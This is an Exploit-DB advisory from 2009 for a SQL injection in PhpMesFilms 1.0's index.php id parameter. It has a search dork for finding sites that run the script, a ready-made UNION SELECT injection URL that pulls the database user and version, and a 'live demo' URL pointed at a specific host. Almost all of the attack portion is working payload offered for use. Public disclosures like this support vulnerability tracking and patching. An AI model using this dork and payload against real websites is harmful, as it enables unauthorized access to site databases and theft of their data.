PhpMesFilms 1.0 index.php id Remote SQL Injection Vulnerability

2009-01-04T00:00:00
ID EDB-ID:7660
Type exploitdb
Reporter SuB-ZeRo
Modified 2009-01-04T00:00:00

Description

PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability. CVE-2009-0598. Webapps exploit for php platform

                                        
                                            [~] in the name of God
[~]
[~] Download script : http://www.script-masters.com/home/download.php?script=138
[~]
[~]----------------------------------------------------------
[~] Discovered By: SuB-ZeRo(from algeria)   msn: FbH@hotmail.com
[~]
[~] D-unit : SuB-ZeRo & Me!sTer & HaLokA
[~]
[~] Home: www.dz-security.net/ my exploit : www.dz-security.net/subzero
[~]
[~] N0T: We ArE MoUsLiMme WiThE GaZa 4 ever
[~] -----------------------------------------------------------
dork : powered by PhpMesFilms
Exploit:
http://www.sit.com/script/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
---------------------------------------------------------------------------------------------
L!Ve DeMo:
http://phpmesfilms.dyndns.org/demo/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
 not : in this script some times version is 4 and some times is 5 have nice day
[~]----------------------------------------------------------------------
[~] Greetz tO: Me!sTer & HaLoKa & MaXi32 & Dz-TeAm and all algeria & gaza
[~] we are D-unit www.dz-security.net
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]